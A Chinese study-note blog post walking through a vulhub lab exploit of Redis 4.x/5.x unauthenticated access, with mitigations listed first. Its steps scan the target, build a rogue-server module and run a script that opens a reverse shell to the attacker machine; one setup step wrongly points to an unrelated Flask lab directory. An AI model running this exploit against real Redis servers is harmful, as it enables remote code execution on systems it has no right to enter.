vulhub学习文档-Redis 4.x/5.x 未授权访问漏洞

Redis 4.x/5.x 未授权访问漏洞

1.redis介绍
Redis 是一个高效数据库,默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。
2.适用类型
数据库版本在4.x/5.x以下
3.预防措施
① Redis添加密码验证
② Redis尽量不要在公网开放(限制来源IP)
③ 使用高版本的Redis
4.具体操作
背景:
攻击机 kali 192.168.126.129
靶机 vulhub 192.168.126.133
Kali
① cd /vulhub/flask/ssti
② docker-compose bulid
③ docker-compose up -d(安装docker)
vulhub学习文档-Redis 4.x/5.x 未授权访问漏洞_第1张图片
④ docker-compose ps(检查docker)
在这里插入图片描述

⑤ nmap 192.168.126.133 -p 1-65535(扫描端口,redis默认6379端口)
vulhub学习文档-Redis 4.x/5.x 未授权访问漏洞_第2张图片

⑥ git clone https://github.com/n0b0dyCN/redis-rogue-server (下载exp.so)
⑦ Cd redis-rogue-server/RedisModulesSDK/exp
⑧ Make (生成exp.so文件)
⑨ cp exp.so …/exp.so (将文件放置在/RedisModulesSDK/)
vulhub学习文档-Redis 4.x/5.x 未授权访问漏洞_第3张图片

⑩ cd redis-rogue-server/
⑪ python3 ./redis-rogue-server.py --rhost 192.168.126.133 --lhost 192.168.126.129(-r参数是指远程Redis IP地址; -L参数是指反弹到的服务器IP地址; 执行命令后,开启监听了本地的60720端口,并成功反弹回了shell。)
vulhub学习文档-Redis 4.x/5.x 未授权访问漏洞_第4张图片
注:报错OSError(98, ‘Address already in use’)
使用ps -fA | grep python 查看端口占用
再使用kill -9 25763 关闭对应端口
最后再查看ps -fA | grep python 端口是否关闭
在这里插入图片描述
⑫ 选择i模式 进行交互操作
vulhub学习文档-Redis 4.x/5.x 未授权访问漏洞_第5张图片

Vulhub
搭建环境
Cd /home/vulhub/vulhub-master/redis/4-unacc
Docker-compose up -d
Docker-compose ps
vulhub学习文档-Redis 4.x/5.x 未授权访问漏洞_第6张图片

参考文章
https://blog.csdn.net/weixin_44447333/article/details/105180274
https://github.com/n0b0dyCN/redis-rogue-server

本篇为自我学习回顾,不能保证完全正确!!!
网络信息安全-ploto

你可能感兴趣的:(vulhub,安全漏洞)